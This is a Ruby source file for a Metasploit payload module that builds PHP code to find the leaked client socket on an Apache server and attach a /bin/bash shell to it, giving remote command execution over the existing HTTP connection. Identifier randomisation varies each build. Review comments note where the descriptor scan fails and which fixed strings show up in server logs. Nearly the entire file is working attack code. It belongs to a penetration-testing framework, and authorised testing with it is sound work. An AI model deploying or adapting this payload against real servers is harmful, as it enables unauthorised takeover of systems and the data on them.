##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
  # The generated PHP changes length on every build because the variable
  # names are randomized, so no fixed size can be cached.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php
  include Msf::Sessions::CommandShellOptions

  # Registers the payload metadata with the framework.
  #
  # The FindShell handler is paired with a plain CommandShell session because
  # the shell is attached to the HTTP connection the exploit already holds
  # rather than to a freshly opened bind/reverse socket.
  #
  # @param info [Hash] module info supplied by the framework, merged with the
  #   values below
  def initialize(info = {})
    details = {
      'Name' => 'PHP Command Shell, Find Sock',
      'Description' => %q{
        Spawn a shell on the established connection to
        the webserver. Unfortunately, this payload
        can leave conspicuous evil-looking entries in the
        apache error logs, so it is probably a good idea
        to use a bind or reverse shell unless firewalls
        prevent them from working. The issue this
        payload takes advantage of (CLOEXEC flag not set
        on sockets) appears to have been patched on the
        Ubuntu version of Apache and may not work on
        other Debian-based distributions. Only tested on
        Apache but it might work on other web servers
        that leak file descriptors to child processes.
      },
      'Author' => [ 'egypt' ],
      'License' => BSD_LICENSE,
      'Platform' => 'php',
      'Handler' => Msf::Handler::FindShell,
      'Session' => Msf::Sessions::CommandShell,
      'Arch' => ARCH_PHP
    }
    super(merge_info(info, details))
  end

  # Builds the PHP that locates the leaked client socket and attaches a shell
  # to it.
  #
  # The script prints a minimal HTML wrapper and flushes it (so the exploit's
  # HTTP response is well-formed before the shell takes over the socket),
  # then probes descriptors 3..49 by asking /bin/bash to read from `<&$i`
  # and echo the number back. The first descriptor that fails to echo marks
  # the end of the open range, and the descriptor just before it is taken to
  # be the client connection; if every probe succeeds the hard-coded default
  # of 13 is used. Finally bash is started with stdin, stdout and stderr all
  # redirected onto that descriptor.
  #
  # NOTE(review): the scan assumes descriptors are contiguous and that the
  # socket is the highest-numbered open one -- a closed descriptor below the
  # socket stops the loop early and selects the wrong fd. Only the four
  # framework-generated variable names are randomized; `$i`, `$foo` and
  # `mysystem` are fixed literals, as is the `/bin/bash ... echo` probe,
  # which is what shows up in server error logs.
  #
  # @return [String] PHP source for the payload
  def php_findsock
    names = Rex::RandomIdentifier::Generator.new
    var_cmd, var_fd, var_out, var_dis =
      %i[var_cmd var_fd var_out var_dis].map { |key| "$#{names[key]}" }

    <<~PHP
      #{php_preamble(disabled_varname: var_dis)}
      print("<html><body>");
      flush();

      function mysystem(#{var_cmd}){
        #{php_system_block(disabled_varname: var_dis, cmd_varname: var_cmd, output_varname: var_out)}
        return #{var_out};
      }

      #{var_fd} = 13;
      for ($i = 3; $i < 50; $i++) {
        $foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
        if ($foo != $i) {
          #{var_fd} = $i - 1;
          break;
        }
      }
      print("</body></html>\n\n");
      flush();

      #{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
      mysystem(#{var_cmd});

    PHP
  end

  # Framework entry point for producing the payload bytes.
  #
  # The PHP is rebuilt on every call, so each generation picks up a fresh set
  # of randomized identifiers.
  #
  # @param _opts [Hash] unused; accepted for interface compatibility
  # @return [String] the PHP payload
  def generate(_opts = {})
    php_findsock
  end
end